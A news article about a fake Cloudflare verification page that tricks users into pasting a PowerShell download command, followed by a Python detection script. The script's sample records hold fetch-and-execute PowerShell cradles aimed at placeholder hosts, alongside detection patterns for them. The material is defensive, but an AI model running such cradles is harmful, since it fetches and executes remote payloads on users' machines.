Hackers use Fake Cloudflare Verification Screen to Trick Users into Executing Malware
A sophisticated social engineering campaign has emerged targeting unsuspecting users through fraudulent Cloudflare verification screens, representing a new evolution in malware distribution tactics.
This attack method leverages the trusted appearance of legitimate web security services to deceive victims into executing malicious code on their systems, exploiting inherent trust in established security providers.
The malware campaign employs a multi-stage attack vector that begins with a convincing fake CAPTCHA verification page designed to mimic Cloudflare’s authentic security checks.
When users encounter this deceptive interface, they are prompted to complete what appears to be a routine verification process, unknowingly initiating a complex malware installation sequence.
Security researchers, including analyst Shaquib Izhar, have identified this campaign as particularly dangerous because of its sophisticated social engineering approach and advanced evasion techniques.
The attack demonstrates how cybercriminals are increasingly exploiting users’ familiarity with legitimate security mechanisms to bypass traditional security awareness training and infiltrate networks.
Upon clicking the “Verify” button, the malicious webpage injects PowerShell code directly into the user’s clipboard while simultaneously capturing their IP address for reconnaissance purposes.
The page then prompts victims to perform an additional verification step, creating a false sense of legitimacy while secretly monitoring their actions through keystroke tracking.
Advanced Infection Mechanism and Payload Delivery
The attack’s infection mechanism reveals sophisticated technical implementation designed to evade detection systems and maintain operational security.
When users access the Windows Run prompt, the malicious webpage establishes communication with the attacker’s command and control infrastructure through embedded webhooks, sending real-time notifications about the victim’s actions.
The pasted PowerShell command retrieves a Base64-encoded payload from pastesio[.]com, which then downloads and executes a hardcoded BAT file from axiomsniper[.]info.
This BAT file incorporates anti-analysis features, specifically checking for virtual machine environments and terminating execution if detected, thereby avoiding automated security analysis systems and sandbox environments.
Currently, the BAT file has zero detections across VirusTotal scanners, which shows how effectively the campaign evades traditional signature-based detection and underlines the need for behavioral analysis in modern defensive strategies.
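Detection logic for the launch pattern described above (a command pasted into the Run prompt spawns PowerShell from explorer.exe with a download cradle or a Base64-encoded command), as an added example that is not part of the article or the researchers' work; the record layout, field names, hosts and command lines are constructed.

```python
# Added example, not from the article: flag ClickFix-style launches, where a command
# pasted into the Windows Run prompt spawns a script host from explorer.exe that
# carries a download cradle or a Base64 -EncodedCommand. All records are constructed.
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
RUN_PROMPT = "script host spawned directly by explorer.exe (Run prompt)"
CRADLE_RE = re.compile(r"\b(iwr|invoke-webrequest|invoke-expression|iex|downloadstring|"
                       r"downloadfile|frombase64string|net\.webclient|curl)\b", re.I)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the text behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def reasons_for(record):
    """Explain why a process-creation record looks like a pasted-command launch."""
    image = record["Image"].rsplit("\\", 1)[-1].lower()
    parent = record["ParentImage"].rsplit("\\", 1)[-1].lower()
    reasons = [RUN_PROMPT] if parent == "explorer.exe" and image in SCRIPT_HOSTS else []
    if CRADLE_RE.search(record["CommandLine"]):
        reasons.append("download/execution cradle on the command line")
    decoded = decode_encoded_command(record["CommandLine"])
    if decoded is not None:
        reasons.append("Base64 -EncodedCommand present")
    if decoded and CRADLE_RE.search(decoded):
        reasons.append("download/execution cradle inside the decoded command")
    return reasons

def is_suspicious(record):
    """Alert only on the combination: Run-prompt launch plus a cradle or encoding."""
    reasons = reasons_for(record)
    return reasons[:1] == [RUN_PROMPT] and len(reasons) >= 2

# Constructed Sysmon Event ID 1-like records; ".invalid" hosts are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EXPLORER = "C:\\Windows\\explorer.exe"
ENCODED = base64.b64encode("iex (New-Object Net.WebClient).DownloadString('http://paste.invalid/p')"
                           .encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": 'powershell -w hidden -c "iex (iwr http://paste.invalid/p -UseBasicParsing)"'},
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell -nop -enc " + ENCODED},
    {"ParentImage": EXPLORER, "Image": "C:\\Windows\\notepad.exe", "CommandLine": "notepad.exe"},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS, "CommandLine": "powershell Get-ChildItem C:\\Temp"},
]
```

Only the combination of a Run-prompt parent and a cradle or encoded command raises an alert, so a user simply opening PowerShell from the Run box is not flagged on its own.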